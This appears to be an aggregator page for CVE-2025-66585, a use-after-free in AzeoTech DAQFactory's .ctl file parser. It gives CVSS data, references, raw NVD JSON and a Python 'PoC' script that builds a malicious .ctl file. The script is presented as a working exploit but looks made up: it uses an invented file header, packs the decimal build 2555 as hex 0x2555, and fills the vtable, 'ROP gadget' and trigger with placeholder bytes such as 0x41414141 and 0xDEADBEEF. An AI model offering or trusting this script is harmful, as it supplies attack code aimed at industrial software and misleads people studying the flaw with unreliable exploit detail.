CVE-2025-66585

Description

In AzeoTech DAQFactory release 20.7 (Build 2555), a Use After Free vulnerability can be exploited to cause memory corruption while parsing specially crafted .ctl files. This could allow an attacker to execute code in the context of the current process.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:azeotech:daqfactory:*:*:*:*:*:*:*:* - VULNERABLE

AzeoTech DAQFactory 20.7 (Build 2555)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2025-66585 PoC - AzeoTech DAQFactory .ctl File UAF
# This PoC generates a malicious .ctl file to trigger Use After Free

import struct
import sys

def create_malicious_ctl():
    """Generate a malicious .ctl file that triggers UAF condition"""
    
    # DAQFactory .ctl file header structure
    header = b'DAQFactory Control File\x00'
    header += struct.pack('<I', 0x207)  # Version 20.7
    header += struct.pack('<I', 0x2555)  # Build 2555
    
    # Create heap grooming payload to trigger UAF
    # This creates conditions for use-after-free in memory parser
    payload = b'\x00' * 256  # Padding
    payload += struct.pack('<I', 0x41414141)  # Fake vtable pointer
    payload += struct.pack('<Q', 0x4242424242424242)  # ROP gadget address
    
    # Malicious channel definitions to trigger vulnerable code path
    malicious_section = bytearray()
    malicious_section += b'Channel\x00'
    malicious_section += b'MaliciousChannel\x00'
    
    # Trigger condition for UAF
    malicious_section += b'\xDE\xAD\xBE\xEF'  # Trigger bytes
    malicious_section += struct.pack('<I', 0x1000)  # Size field
    malicious_section += b'\x00' * 0x100  # Malformed data
    
    # Construct final .ctl file
    ctl_content = header + payload + malicious_section
    
    return ctl_content

def main():
    print("[*] CVE-2025-66585 PoC Generator")
    print("[*] Target: AzeoTech DAQFactory 20.7 (Build 2555)")
    print("[*] Vulnerability: Use After Free in .ctl file parser")
    
    # Generate malicious .ctl file
    malicious_ctl = create_malicious_ctl()
    
    # Write to file
    output_file = "CVE-2025-66585_malicious.ctl"
    with open(output_file, 'wb') as f:
        f.write(malicious_ctl)
    
    print(f"[+] Generated malicious .ctl file: {output_file}")
    print(f"[+] File size: {len(malicious_ctl)} bytes")
    print("[!] This file should be opened with DAQFactory 20.7 to trigger the vulnerability")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66585
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66585
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66585/
[4] VulDB https://vuldb.com/cve/CVE-2025-66585
[5] https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-03

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66585", "sourceIdentifier": "[email protected]", "published": "2025-12-11T21:15:57.430", "lastModified": "2026-01-02T20:04:10.203", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In AzeoTech DAQFactory release 20.7 (Build 2555), a Use After Free vulnerability can be exploited to cause memory corruption while parsing specially crafted .ctl files. This could allow an attacker to execute code in the context of the current process."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:azeotech:daqfactory:*:*:*:*:*:*:*:*", "versionEndExcluding": "21.1", "matchCriteriaId": "5376DDEC-0BAA-465A-9EFB-62B3600336E8"}]}]}], "references": [{"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-03", "source": "[email protected]", "tags": ["Third Party Advisory", "US Government Resource"]}]}}